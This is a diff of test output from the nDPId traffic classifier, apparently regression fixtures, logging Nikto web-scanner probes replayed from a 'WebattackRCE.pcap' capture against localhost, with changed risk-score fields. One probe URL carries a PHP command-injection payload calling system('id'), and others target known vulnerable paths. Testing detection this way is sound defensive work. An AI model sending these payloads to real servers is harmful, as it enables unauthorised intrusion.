 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1576420277498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"ts_msec":1576420277498,"pkt":"AAAAAAAAAAAAAAAACABFAAC88otAAEAGSa5\/AAABfwAAAcWaH5CxdspY+6ys9YAYAED+sAAAAQEICp1m\/iKdZv4iR0VUIC9zc2hvbWUvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sshome\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000020)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sshome\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000020)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1576420277499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"ts_msec":1576420277499,"pkt":"AAAAAAAAAAAAAAAACABFAAC61XNAAEAGZsh\/AAABfwAAAcWcH5BK5u2wb4yQmIAYAED+rgAAAQEICp1m\/iOdZv4jR0VUIC90aWtpLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIxKQ0KDQo="}
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000021)"}}
+01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000021)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1576420277500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1576420277500,"pkt":"AAAAAAAAAAAAAAAACABFAADKj49AAEAGrJx\/AAABfwAAAcWeH5BxerdT3YbEDoAYAED+vgAAAQEICp1m\/iSdZv4kR0VUIC90aWtpL3Rpa2ktaW5zdGFsbC5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAyMikNCg0K"}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/tiki-install.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000022)"}}
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/tiki-install.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000022)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1576420277501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"ts_msec":1576420277501,"pkt":"AAAAAAAAAAAAAAAACABFAADQ2RZAAEAGYw9\/AAABfwAAAcWgH5BlMeHM00k6b4AYAED+xAAAAQEICp1m\/iWdZv4lR0VUIC9zY3JpcHRzL3NhbXBsZXMvZGV0YWlscy5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwMjMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/samples\/details.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000023)"}}
+01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/samples\/details.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000023)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7440000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1576420277503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"ts_msec":1576420277503,"pkt":"AAAAAAAAAAAAAAAACABFAADzlctAAEAGpjd\/AAABfwAAAcWiH5BEoK0q6pkm3YAYAED+5wAAAQEICp1m\/iedZv4nR0VUIC9mb3J1bWRpc3BsYXkucGhwP0dMT0JBTFNcW1xdPTEmZj0yJmNvbW1hPVwiLnN5c3RlbVwoJ2lkJ1wpXC5cIiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDA3MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7440000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000070)"}}
+01110{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7440000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000070)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1576420277505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"ts_msec":1576420277505,"pkt":"AAAAAAAAAAAAAAAACABFAADNh+tAAEAGtD1\/AAABfwAAAcWkH5AZpL8K5\/crh4AYAED+wQAAAQEICp1m\/imdZv4oR0VUIC9ndWVzdGJvb2svZ3Vlc3Rib29rLmh0bWwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwNzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook\/guestbook.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000071)"}}
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook\/guestbook.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000071)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1576420277506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":1576420277506,"pkt":"AAAAAAAAAAAAAAAACABFAADSOPFAAEAGAzN\/AAABfwAAAcWmH5AZrAAQDbKHy4AYAED+xgAAAQEICp1m\/iqdZv4qR0VUIC9odG1sL2NnaS1iaW4vY2dpY3NvP3F1ZXJ5PUFBQSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDcyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/html\/cgi-bin\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000072)"}}
+01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/html\/cgi-bin\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000072)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1576420277509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420277509,"pkt":"AAAAAAAAAAAAAAAACABFAADGjRRAAEAGrxt\/AAABfwAAAcWoH5A27bX0CottMYAYAED+ugAAAQEICp1m\/i2dZv4sR0VUIC9iYi1kbmJkL2ZheHN1cnZleSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE0MikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-dnbd\/faxsurvey","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000142)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-dnbd\/faxsurvey","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000142)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
